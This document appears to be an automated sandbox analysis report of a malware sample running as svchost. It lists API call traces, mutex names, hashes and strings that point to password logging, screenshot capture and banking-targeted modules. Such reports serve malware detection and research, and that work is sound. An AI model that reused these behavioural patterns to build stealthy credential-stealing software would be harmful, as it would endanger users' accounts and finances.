                                                                                                                                                                                                                • API String ID: 1455050916-1498703533
                                                                                                                                                                                                                • Opcode ID: acf0aeb5abaefe9d23edd10d727ca9d7b0d8ad5d72c2824fc1adc8f4b1bb4b31
                                                                                                                                                                                                                • Instruction ID: 70e8c070a62d79d1a702d8c05a980fd3539fdcaf1ae3832fc8c41d5ad0826bda
                                                                                                                                                                                                                • Opcode Fuzzy Hash: acf0aeb5abaefe9d23edd10d727ca9d7b0d8ad5d72c2824fc1adc8f4b1bb4b31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD3126759402195BCB219BB4FC9CBEA77A8AB49B00F848595E986E7300DB70DD94CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D41BA7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41BE7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D41BF1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D41BF9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41C0A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D41C11
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D41C4B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D41C58
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214},?,?), ref: 02D41C77
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D41C88
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D41C8F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D41CA1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D41CB2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateErrorFileHandleLastMutexPath$AdminAttributesBackslashCloseDeleteDirectoryFolderInformationMakeReleaseSleepSystemUser
                                                                                                                                                                                                                • String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$pass.log
                                                                                                                                                                                                                • API String ID: 1707266166-187836521
                                                                                                                                                                                                                • Opcode ID: e14c5ad2e07ddfca530324192d99c65cf475e1d2b3ebde96c640f3fe150115a9
                                                                                                                                                                                                                • Instruction ID: e81604f29bf54f3ff3d28d8ddf47084f3be11fd51a33c7601df2742e06b4269f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e14c5ad2e07ddfca530324192d99c65cf475e1d2b3ebde96c640f3fe150115a9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F741C130944219ABDB119B24E85CBEABBA8EF45301F548595E88AD7340EF70DED4CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D41BA7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41BE7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D41BF1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D41BF9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41C0A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D41C11
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D41C4B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D41C58
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214},?,?), ref: 02D41C77
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D41C88
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D41C8F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D41CA1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D41CB2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateErrorFileHandleLastMutexPath$AdminAttributesBackslashCloseDeleteDirectoryFolderInformationMakeReleaseSleepSystemUser
                                                                                                                                                                                                                • String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$pass.log
                                                                                                                                                                                                                • API String ID: 1707266166-187836521
                                                                                                                                                                                                                • Opcode ID: 0f28e8da7810b4153b43712a474b6307eaecd1b50cbc811ae63349a4880c3e90
                                                                                                                                                                                                                • Instruction ID: 2b48da0b11a96a483c298c11b6c88e0f1a20d8009c34cb449551c707a176d48b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f28e8da7810b4153b43712a474b6307eaecd1b50cbc811ae63349a4880c3e90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9431D230944219AFDB218B24E81CBEABBA8EF45301F548595E88AD7340EF70DED4CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3B26A
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3B2AC
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3B2B8
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3B2BC
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3B2CD
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3B2D4
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3B303
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3B309
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3B30D
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3B31E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3B325
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D3B35A
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02D3B370
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$5e8dc0d9$scrs
                                                                                                                                                                                                                • API String ID: 224938940-3741360634
                                                                                                                                                                                                                • Opcode ID: f0c0f7049bd63a6379f5acb0393cd89bd7df6f2043fbc859c5b9f16a4862fb6a
                                                                                                                                                                                                                • Instruction ID: 8e7099587be5c82ae480f935f10b13b89414d722e773ebd2d5b6aebb9a6f7b5d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0c0f7049bd63a6379f5acb0393cd89bd7df6f2043fbc859c5b9f16a4862fb6a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0312475A002185BCB219B74EC9CBEA77A8AB49704F844595E989C7300EB70DD84CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc1e5), ref: 02D3E8FA
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E93C
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3E948
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3E94C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E95D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3E964
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E993
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3E999
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3E99D
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E9AE
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3E9B5
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D3E9EA
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02D3EA00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$5e8dc1e5$scrs
                                                                                                                                                                                                                • API String ID: 224938940-3256838827
                                                                                                                                                                                                                • Opcode ID: 76f461ff98d9658beb7749bbf2909bcc3c5777cf85c9fba6ce9a8e19640802f2
                                                                                                                                                                                                                • Instruction ID: 009f07fac3b9633d8d5029cf3cdbd1b806e0d5d1450ad4e70401525b0b0598c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76f461ff98d9658beb7749bbf2909bcc3c5777cf85c9fba6ce9a8e19640802f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA310571D002195BCB21DB74EC9CBEA77A8AF49700F944890E985D7380EBB0DD94CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3D7), ref: 02D419BA
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D419FC
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D41A08
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D41A0C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41A1D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D41A24
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41A53
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D41A59
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D41A5D
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41A6E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D41A75
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D41AAA
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02D41AC0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$5E8DC3D7$scrs
                                                                                                                                                                                                                • API String ID: 224938940-1906680958
                                                                                                                                                                                                                • Opcode ID: e3464785cc23c8cadc3a90933ba19a334b4d74a21ed5935f1286db67ad9729e0
                                                                                                                                                                                                                • Instruction ID: a53485c2504c039317817a1e5d903033a74f4b9f4658e57d198c592878308209
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3464785cc23c8cadc3a90933ba19a334b4d74a21ed5935f1286db67ad9729e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0431F0719402195BCB209B74A89CBEA7BE8AB49740F984591E9C9C7300EB70DDD9CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F80A
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3F84C
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3F858
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3F85C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3F86D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3F874
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3F8A3
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3F8A9
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3F8AD
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3F8BE
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3F8C5
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D3F8FA
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02D3F910
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$5e8dc163$scrs
                                                                                                                                                                                                                • API String ID: 224938940-108755612
                                                                                                                                                                                                                • Opcode ID: 8f5dcdae41a1e116c608601697e5d921b835a2ac5f4fb2eb49e44c07638db956
                                                                                                                                                                                                                • Instruction ID: 960f005a74d05cee423aa0ec54a55868b3354c91dfceef523acf01f5e5387ed8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f5dcdae41a1e116c608601697e5d921b835a2ac5f4fb2eb49e44c07638db956
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 333112B1E402195FCB219B74AC9CBEA77A8AB45700FA44590E985C3300EBB0DD84CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D33160
                                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D331A8
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 02D331BE
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D331C6
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02D331CD
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(02D7DFC4,?,00000005), ref: 02D331EF
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(02D7DFC4), ref: 02D331F6
                                                                                                                                                                                                                  • Part of subcall function 02D33000: memset.MSVCRT ref: 02D33021
                                                                                                                                                                                                                  • Part of subcall function 02D33000: GetDriveTypeA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33038
                                                                                                                                                                                                                  • Part of subcall function 02D33000: SetCurrentDirectoryA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33048
                                                                                                                                                                                                                  • Part of subcall function 02D33000: _snprintf.MSVCRT ref: 02D33075
                                                                                                                                                                                                                  • Part of subcall function 02D33000: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02D33097
                                                                                                                                                                                                                  • Part of subcall function 02D33000: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,74DE9300), ref: 02D330C1
                                                                                                                                                                                                                  • Part of subcall function 02D33000: LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330D0
                                                                                                                                                                                                                  • Part of subcall function 02D33000: WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02D330E9
                                                                                                                                                                                                                  • Part of subcall function 02D33000: UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330FA
                                                                                                                                                                                                                  • Part of subcall function 02D33000: GetHandleInformation.KERNEL32(00000000,?), ref: 02D33117
                                                                                                                                                                                                                  • Part of subcall function 02D33000: CloseHandle.KERNEL32(00000000), ref: 02D33128
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(02D7DFC4,?,00000005), ref: 02D3323F
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(02D7DFC4), ref: 02D33246
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Drive$Type$CurrentHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLockLogicalModePointerPriorityStringsUnlockWrite_snprintf
                                                                                                                                                                                                                • String ID: AppEvents$Console$Control Panel$Environment$Identities$Software$System
                                                                                                                                                                                                                • API String ID: 1338089429-328203234
                                                                                                                                                                                                                • Opcode ID: 0d3ad3faa24e02c245e4be0f8cf9994a75da1c28697c863ff3332fa22498c104
                                                                                                                                                                                                                • Instruction ID: 52caa5a7b775611c76599cf43cd620ddb2e286bf012c5923ba5ff08c99e0e0c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d3ad3faa24e02c245e4be0f8cf9994a75da1c28697c863ff3332fa22498c104
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B731BDB5D402949BDB11EF90EA1C7AEBB66FF00704F904989E90996380D7745E54CFE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D408FC
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D40912
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D40920
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D40929
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D40947
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D40955
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D40790,00000000,00000000,00000000), ref: 02D4096A
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D4097B
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D40980
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D40994
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D409A2
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc15b), ref: 02D409AD
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5e8dc15b,INIST), ref: 02D409C7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 5e8dc15b$INIST$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
                                                                                                                                                                                                                • API String ID: 2736094147-3345590504
                                                                                                                                                                                                                • Opcode ID: 253eb6d23db45943a1c6765bb4af0dbb4bc90b583561ff6780eefc56cb95fe7f
                                                                                                                                                                                                                • Instruction ID: f164390c7ca615906129c99d48331edce952ba497747a183845b3a5232a77116
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 253eb6d23db45943a1c6765bb4af0dbb4bc90b583561ff6780eefc56cb95fe7f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C921D332A853156BF2219761AC0AF1A73989F44B66F584604FF45A63C0DFB49D048AB6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D4008C
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D400A2
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D400B0
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D400B9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D400D7
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D400E5
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3FF20,00000000,00000000,00000000), ref: 02D400FA
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D4010B
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D40110
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D40124
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D40132
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC123), ref: 02D4013D
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5E8DC123,IBANK), ref: 02D40157
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 5E8DC123$IBANK$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
                                                                                                                                                                                                                • API String ID: 2736094147-2581443150
                                                                                                                                                                                                                • Opcode ID: 4a5178bee18f3a78cdc70b8a634a0de907996e13ecd3c07deb3c383bece1118c
                                                                                                                                                                                                                • Instruction ID: 275d43ca49e4c21c9002621ec1a0f63c452be3d9934188749a3677b7f240cd0b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a5178bee18f3a78cdc70b8a634a0de907996e13ecd3c07deb3c383bece1118c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB21D332A857142BF22167A0AC0EF1E73989F45BA5F244604FE45A63C0DFB4AC048AB6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D4107C
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D41092
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D410A0
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D410A9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D410C7
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D410D5
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D40DE0,00000000,00000000,00000000), ref: 02D410EA
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D410FB
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41100
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D41114
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D41122
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3C1), ref: 02D4112D
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5E8DC3C1,INTER), ref: 02D41147
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 5E8DC3C1$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
                                                                                                                                                                                                                • API String ID: 2736094147-304506436
                                                                                                                                                                                                                • Opcode ID: 4fc6b9f11d771c346bf426eaf6fddfc4bbc6eeef39ffcacea27d0ef19ae6b483
                                                                                                                                                                                                                • Instruction ID: c6c24db540f5e8b4c7598d9902a9dd3369cc9df1e5e2507fb334c360ced3d75a
